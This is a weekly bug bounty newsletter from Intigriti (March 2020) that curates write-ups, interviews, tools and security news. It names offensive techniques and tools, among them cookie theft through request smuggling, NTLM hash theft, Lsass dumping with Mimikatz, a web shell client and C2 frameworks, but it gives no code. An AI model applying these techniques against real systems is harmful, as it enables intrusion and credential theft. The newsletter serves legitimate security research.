By Intigriti
March 17, 2020
Hey hackers! These are our favorite resources shared by pentesters and bug hunters last week.
Bug Bytes is a weekly newsletter curated by members of the bug bounty community. The first series is curated by Mariem, better known as PentesterLand. Every week, she keeps us up to date with a comprehensive list of write-ups, tools, tutorials and resources.
This issue covers the week from 06 to 13 of March.
BSidesSF 2020, especially:
– Panel: Let’s Get 360 w/Bug Bounty!
– How To Write Like It’s Your Job
– The Voight-Kampff Test for Discovering Vulnerabilities
– Panel: Mental Health for Hackers
The range of (interesting) topics tackled in this conference is amazing. There are at least 10 talks I really need to watch. During these difficult times of Coronavirus quarantine / social distancing, this is an excellent way to pass time.
– The unexpected Google wide domain check bypass (Google, $6,000)
– Mass account takeovers using HTTP Request Smuggling on https://slackb.com/ to steal session cookies (Slack, $6,500)
These are two very impressive findings! The first one was found by analyzing a Regex found in obfuscated JavaScript code. It was used for URL validation in a Google app. @xdavidhu found a way to bypass the check. The impact was low/medium, but he later found that the vulnerable code was part of a JS library common to many Google Web apps including Gmail and Google Docs.The second vulnerability is an HTTP Request Smuggling CL.TE hijack attack found on Slack. It was possible to steal victims’ session cookies by redirecting them to an attacker-controlled Collaborator server. The writeup is pretty explanatory. And the attack could have been exploited for massive account takeovers.
@Mrtuxracer Talks About Monitoring Endpoints, Binary Exploitation, Continuous Recon and More!
This is @NahamSec’s latest interview, with @Mrtuxracer. I find it particularly interesting because of @Mrtuxracer’s approach. He explains his unique recon process, talks about continuous monitoring of JavaScript files and endpoints, some of his custom tools, API hacking, etc.This is definitely worth watching if you want to learn about bug hunting methodology, differentiating yourself, or which kind of custom tools other bug hunters are using.
Bug Bounty Hunting Tips #4 — Develop a Process and Follow It
“Admittedly, it can feel great for the first hour or so but after that, you can start to become bored and frustrated if you don’t find anything. And without a structured bug bounty hunting process, you probably won’t find anything new.”Do this ring any bell? This excellent article goes over how to create a high-level process for bug hunting. Apart from technical methodologies, some decisions can help avoid frustration. This includes choosing a bug hunting approach, deciding minimum and maximum time to spend on a target and minimum time for writing reports.
Bug Business #2 – Hacking, traveling and vlogging with @STÖK
There are only two publications related to bug bounty that I wait for impatiently and devour as soon as they’re published: EdOverflow’s newsletter and this new interview series.
The first issue was with EdOverflow. The last one is an excellent read if you want to learn how Stök juggles between different projects, his filming process, how he manages full-time bug hunting without pulling all-nighters (Early birds, hello!)…
Security Weekly News #16 – Security Weekly News Wrap Up & #17 – James Adams and the News
The Privacy, Security, & OSINT Show – 160-Telephone Search Offense & Defense
Vulnerability Scanner Fails: 5 Ways You Can’t Fake The Human Element
Innovative Application Security Testing Techniques for Modern Software Development
Abusing File System functions in web applications – steal NTLMv2 hash
Kerberosity Killed the Domain: An Offensive Kerberos Overview
Red Team Tactics: Advanced process monitoring techniques in offensive operations
Defeating RunAsPPL: Utilizing Vulnerable Drivers to Read Lsass with Mimikatz
Twisted Version 19.10.0 #Web #RequestSmuggling
Multiple vulnerabilities found in Zyxel CNM SecuManager #Network
Slack DTLS uses a private key that is in the public domain, which may lead to SRTP stream hijack (Slack, $2,000)
Disabled account can still use GraphQL endpoint (Hackerone, $500)
TURN server allows TCP and UDP proxying to internal network, localhost and meta-data services (Slack, $3,500)
Lack of input validation that can lead Denial of Service (DOS) (Twitter, $560)
Generate valid signatures for files hosted in Facebook CDNs.
Broke limited scope with a chain of bugs (tips for every rider CORS)
BGP Search: A Python wrapper for searching on https://bgp.tools (Takes organization name as input & output IP ranges)
iprobe: Take a list of IP addresses or IP range and probe for working HTTP and HTTPS servers (similar to httprobe but also takes IPs and IP ranges as input)
HTTP-FUZZER: Go fuzzer that is burp-compatible and able to fuzz some random parameters in the raw http request
Sub-Drill: A very (very) simple Subdomain Finder based on online certification services (threatcrowd, hackertarget, crt.sh, certspotter & findsubdomains)
Exegol: A Kali light base with a few useful additional tools and some basic configuration
Brownie tub: A Standalone Web Shell Client
Starkiller & Introduction: GUI application for interfacing with Empire. It allows for multi-user support and ease of operations
NTLM scanner: A simple python tool based on Impacket that tests servers for various known NTLM vulnerabilities
Password Guesser: Script to generate custom password wordlist to guess weak passwords
Sifter: OSINT, recon & vulnerability scanner in Bash for penetration testing
Callidus & Introduction: C# tool that allows red team operators to leverage O365 services for establishing command & control communication channel
Exploit-workshop: A step by step workshop to exploit various vulnerabilities in Node.js and Java applications
Throwback Threat Thursday: WordPress 4.7 WP-JSON Content Injection Vulnerability
Busting Ghostcat: An Analysis of the Apache Tomcat Vulnerability (CVE-2020-1938 and CNVD-2020-10487)
Earn cash or a free month of Pentesterlab by contributing to @codingo_’s Interlace
Google awards $100k to Dutch bug hunter for cutting-edge cloud security research
@TheParanoids’s next Live Hacking Event in Singapore is converted into a Virtual Hacking Event
Microsoft SMBv3.11 Vulnerability and Patch CVE-2020–0796 Explained
48K Windows Hosts Vulnerable to SMBGhost CVE-2020-0796 RCE Attacks
Vulnerable TV streaming app could give attackers full control over users’ devices
Avast disables JavaScript engine in its antivirus following major bug
Avast AntiTrack certificate bug allowed others to snoop on your online activities
WordPress Terror: Researchers discover a massive 5,000 security flaws in buggy plugins
AMD processors from 2011 to 2019 vulnerable to two new attacks
Modern RAM used for computers, smartphones still vulnerable to Rowhammer attacks
Jenkins security: Latest advisory highlights more than 20 vulnerable plugins
Years-long campaign targets hackers through trojanized hacking tools
NordVPN HTTP POST bug exposed customer information, no authentication required
How poor IoT security is allowing this 12-year-old malware to make a comeback
Nvidia’s calling on gaming PC owners to put their systems to work fighting COVID-19
List of Free Software and Services During Coronavirus Outbreak
Czech hospital hit by cyberattack while in the midst of a COVID-19 outbreak
Two people who went to RSA security conference test positive for COVID-19
New US Bill Aims to Protect Researchers who Disclose Govt Backdoors
Microsoft shares nightmare tale: 6 sets of hackers on a customer’s network
Brave to generate random browser fingerprints to preserve user privacy
Google engineers open-source Linux tool that prevents USB keystroke injection attacks
We created a collection of our favorite pentest & bug bounty related tweets shared this past week. You’re welcome to read them directly on Twitter: Tweets from 02/06/2020 to 02/13/2020.
Curated by Pentester Land & Sponsored by Intigriti